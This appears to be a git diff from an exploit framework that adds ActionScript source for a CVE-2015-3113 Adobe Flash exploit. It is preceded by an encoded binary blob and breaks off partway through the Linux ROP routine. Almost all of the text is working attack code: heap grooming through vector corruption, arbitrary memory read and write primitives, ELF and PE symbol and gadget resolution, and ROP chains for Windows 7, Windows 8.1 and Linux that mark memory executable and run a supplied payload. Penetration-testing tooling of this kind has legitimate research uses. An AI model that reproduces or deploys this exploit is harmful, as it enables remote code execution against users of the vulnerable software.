zFi4`E+o_v)$;vW^ADpxOJ`o`Z26gV5@0QlSp9(8^UM;ZTsh=#m2}+r_KhLuUY|?gP
z$w@<NGna;6+UFzu^lei}Qs$}exgyTtG5>^?K-j<=y3|196IHXTz8$qg`>N!Gp`gGI
zc)Z0Y?z*8JGF5|fTx*m^OdjDP+P<JGNbpoU<Ln{m%Ln0<lydA&r6@rXGbni7I6S%8
z^T|+A@yk-&BdTOl@2Wt4Z);ZXmu_Mp6(TI%`m*KeCW)S1AnQ)l?nXYVk}}CXbeqf%
z)2e$NbmbNHFL+xq0W;Yyq7gce$j`T2>V-~-<31}zlqw|kZ=U;`NzwRbW{Hlqf(+M^
zK0iX>5uLIA<Y-F9c-==OnN=SW!Ba#^Qm{CY=eEQS92yuPFc;7uxEth9>2a4INc}n9
zD>I)irHM2beLc^UX%j3P*U?`1m05m&Npj*b5s9Cqb1V%{7=S)O!>7ld&cc^knQeoF
ziUaTK6Li*`6}44y@Fn%gb=!RoY|=@GxjFlNVT(<5_S4CFWS-b9<d4L=*kgg7*IHX~
zvqAQb+?wNp{ggxd{~^66KaGrmcMkCv$gg5nwQi~TA#Yp=O>wOLR#qs>-vhqK>YYX^
z-I?t<AiNFX5`hlsg~Qq*7v)?VFJeUjyL~Dqe}j7V(=~DuBZ4S1WZ=2=-lmfr^HET4
zD;~yNx~5fbyhtY<fx4=*_Y$4tUE12s`q`A7!?P)~>2ID?Y$|7!IzNd=WQE`F!i|{3
zasJe<WQes_J4gDU{pCzLa_=;1ksf+o<qyD6j!=FZOq|l+M?N;>;waa!<Izj?g((ep
zD6LrVf8=e!N_hI%7r%u_(|WK4J3nRcjQ-qiRuz#4Zy=EhV^HB(3$R82r~&f!^?KEC
zF`|?TM>2C)x*(e(aEdBrPwm7AD@9r5s<+liwN;hHuy?I^Lsbnw{dw=pbZG$p<01);
z6;~Q#22c&14c2l<Fzhtg3Pz0RAv_9V*Y2u9K?&Fj2M5{Y6)(Rbo$Ey<d-FdI?~7WS
zFKvBQfozPPZT0)k*>QD3#W7wB;!$P6OwzHaO>4TXekq(-6njA-q5mG<TErmzeo?Nc
zY^B)g+SB?!#mT2X^3XZl!>E?6Vt#MC`Ce)Chcc$Bsb>W;uDs~Y{2`dx9=`!)AtHc_
z%0LA4cyud2kuUjDZEKaNT1G#t$AdW-1k4Pzoq}T7>Oe-|{dj%<jS|NHj1MU=$eD7)
zzN#0vh=SHxnNvyXd^70^(tokltHr`ZN#mgU7(3MKqf>2V=}jN<Hpfi2y#!+ZPfXkO
z{li}!OyJ7zBQ?*=7@acEW{5>xT&3!Nz^7v%r0v?o7uwFM0Qpz%_r>V*!c9q)Av!U@
z`09SRNoaX7nVavQN3kg`R~Qv&AxV0O*}<QR$5|;Q-Uz_tL9-JSKZz74M}LefZ=i26
zWwCh#LqWkIZ=x~O@L!y1Es%y`(J@<j#5%mS%Joyo1M6%vknie{dK0x!Gbx%Or7phK
zj!#Kt>4<VkN1_Q$!LQ!x<%UY1YkD{?H(>E}f{IH1shw)KuWML@h`b?QJ5YL=zH+O{
za1gEHub>l$@a5rfVW{*e$!S;ra^<Tz45J+Eg!NYOx`9_Q$3Wp3Q`L7JKj$}kmQ+mY
z(;0W6;#ddhrj=Yjp!>%*oJC$>J2#H7+FJ4RZzH#KT||)h#=PWMKcfH$H_pNw>IiiD
z17K3TjVWk~RUJcjOb>@W8j<t4Ob=egB*(zA!;{3m_Z0bAsnv}Na_6>fgv+&U3ic!m
z$vIUrZ@+AHPjT-a34U+PuUW;vc}FmHZu<{u$JYt$w%%r~3SHS1C7c>ptc{_*u0xQs
z^~ypb-X)_t|1N!1y`wG-Afh=OtXE|bnn6^-0~XkA8(W{`VVg6+1}1yOtVntvzBNBY
zX}`c{aS;7&s{zI8=Bv_-3gl)yqW7_Fh;^s}$h1IvV=PX@csFwB)#SLDWSHs%BiI1A
z^nPS@<Jqu@?+l!fI~m+$5rt;3=DM~BXDF~QBL$qpV9uWMeEBw6CMtvDmzielaRB%$
zr)jHNwgq?f))h^F`q}qt_4`d$mQaekfL5KIc&b+IDWWshV@fZLn{j0C<Q4m10fuXz
zfLA?KWiW2I(Z{BLMT+p+t^5;XxIBW9Q3!xwMae0I4<#S#aK$P};_PX*QB~53FPTjO
zxdTs<>@M)3prYO4o>kXCNkW~@;la|^HIqFuU%P`b8R_OgJ0Xzel1PtoY$RNn1ILwc
zGe4eDo71EM(q+Q9l#7P%Fx}q5#bfq;N~Pn{TLS(nF5?W<bF*RS7mT-(nU3hcU07-<
zNlByTds!4oUMoG`h>)u!1;U5*snCl<nCW4b32cYp)s^-xScOsK1XbbicC2_IjZB;}
zQEo|UZ6zhY65ehVa5l0TwILP{G5EZ3MPHDvU!d12`eYt?tun!i-$B^K-!;K^=(EO2
zZnDZLVK+r3zSk*W#)K3Q3XWeL)-RGN8h3YZ@s!>VeD%WA9ix-1E1b|bFTD~TtTGOr
z7epU)e2e!V*M%J9r>hA$c_V)7FmaQ$H$TBS$;-Z_tI(xo36!k!I)+k-9uCS5I#+`n
zC88ughemvhr;*VKFdW86EB}eVH2+^?m(`Mk$1ImXJ&G`)SrpxC4p@OBsQM}vx&*av
z+$_~I9e8FBOc|^OuZ#1&NO_nL?@`wV2snO1m0XH#s#|emNsU}S)Ruzg%iMX)1#19u
zQt%`WkT}A&7fom;@QTsbTRc`QNQAwU<evtbtr`mZ>1myab!}I^wFxZkJoh7(>u`m$
z4HAVJ`Qt!Ixk)1UyDa!stMt%;gJx4citRVD?b6I1a=(e8PheDKjo_|!Cja*J$pa83
BqIm!S

literal 0
HcmV?d00001

diff --git a/external/source/exploits/CVE-2015-3113/Elf.as b/external/source/exploits/CVE-2015-3113/Elf.as
new file mode 100644
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3113/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3113/Exploit.as b/external/source/exploits/CVE-2015-3113/Exploit.as
new file mode 100755
index 0000000000..552bc6f14c
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3113/Exploit.as
@@ -0,0 +1,114 @@
+package 
+{
+    import flash.display.Sprite
+    import flash.events.Event
+    import flash.events.NetStatusEvent
+    import flash.events.AsyncErrorEvent
+    import flash.media.Video
+    import flash.net.NetConnection
+    import flash.net.NetStream
+    import flash.utils.getTimer
+    import flash.utils.ByteArray
+    import mx.utils.Base64Decoder
+    import flash.display.LoaderInfo
+    
+    public class Exploit extends Sprite 
+    {
+        private var b64:Base64Decoder = new Base64Decoder()
+        private var payload:ByteArray
+        private var platform:String
+        private var os:String
+        private var exploiter:Exploiter
+        
+        public var bytes:Class;
+        public var video:Video = new Video(640, 480);
+        public var vecVectors:Vector.<Object>;
+
+        public function Exploit():void {
+            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray()
+            
+            addChild(video)
+            var nc:NetConnection = new NetConnection()
+            nc.addEventListener(NetStatusEvent.NET_STATUS , onConnect)
+            nc.addEventListener(AsyncErrorEvent.ASYNC_ERROR , trace)
+            var metaSniffer:Object=new Object()
+            metaSniffer.onMetaData=getMeta
+            nc.connect(null)
+            var ns:NetStream = new NetStream(nc)
+            ns.client = metaSniffer
+            video.attachNetStream(ns)
+            vecVectors = new Vector.<Object>(0x1000)
+            for ( var i:uint = 0; i < vecVectors.length; ++ i ) {
+                vecVectors[i] = new Vector.<uint>((0x2000 - 8) / 4);
+                vecVectors[i][0] = 0xdeedbeef;
+            }
+        
+            for ( i = 0; i < vecVectors.length; i += 2 ) {
+                vecVectors[i] = null;
+            }
+            
+            ns.addEventListener(NetStatusEvent.NET_STATUS, statusChanged)
+            ns.play("poc2.flv")
+        }
+
+        private function go():void {
+            var bigVector:Vector.<uint> = null;
+            for ( var i:uint = 0; i < vecVectors.length; i++ ) {
+				if (vecVectors[i] == null) continue
+                if ( vecVectors[i].length > (0x2000 - 8) / 4 ) {
+                    bigVector = vecVectors[i] as Vector.<uint>
+                }
+            }
+            
+            if ( null == bigVector ) {
+                return;
+            }
+            
+            for ( i = 0; i < 0x2000; i++ ) {
+                if (bigVector[i] == 0x7fe && bigVector[i + 2] == 0xdeedbeef) {
+                    bigVector[0x3fffffff] = bigVector[i + 1]
+                    break
+                }
+            }
+
+            for ( i = 0; i < vecVectors.length; i++ ) {
+				if (vecVectors[i] == null) continue
+                if (vecVectors[i].length != 0x7fe) {
+                    delete(vecVectors[i])
+                    vecVectors[i] = null
+                }
+            }
+            
+            exploiter = new Exploiter(this, platform, os, payload, bigVector, 0x7fe)
+        }
+
+        private function statusChanged(stats:NetStatusEvent):void {
+            if (stats.info.code == 'NetStream.Play.Stop') {
+                WaitTimer(1000)
+                go()
+            }
+        }
+
+        private function getMeta (mdata:Object):void {
+            video.width=mdata.width/2
+            video.height=mdata.height/2
+        }
+
+        private function onConnect(e:NetStatusEvent):void {
+            return
+        }
+        
+        private function WaitTimer(time:int):void{
+            var current:int = getTimer()
+            while (true) {
+                if ((getTimer() - current) >= time) break
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3113/ExploitByteArray.as b/external/source/exploits/CVE-2015-3113/ExploitByteArray.as
new file mode 100644
index 0000000000..a8da46df7b
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3113/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3113/ExploitVector.as b/external/source/exploits/CVE-2015-3113/ExploitVector.as
new file mode 100644
index 0000000000..18aa4778a0
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3113/ExploitVector.as
@@ -0,0 +1,75 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint 
+        
+        public function ExploitVector(v:Vector.<uint>, length:uint)
+        {
+            uv = v
+            original_length = length
+        }
+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3113/Exploiter.as b/external/source/exploits/CVE-2015-3113/Exploiter.as
new file mode 100644
index 0000000000..ecbf56fac5
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3113/Exploiter.as
@@ -0,0 +1,399 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:ByteArray
+        private var platform:String
+        private var op_system:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(90000)
+
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+            op_system = os
+
+            ev = new ExploitVector(uv, uv_length)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+                spray[i][0] = eba.ba
+                spray[i][1] = exploit 
+                spray[i][2] = stack
+                spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+            main = ev.at(pos + 1) - 1
+            stack_object = ev.at(pos + 2) - 1
+            payload_space_object = ev.at(pos + 3) - 1
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux") {
+                do_rop_linux()
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
+                return
+            }
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
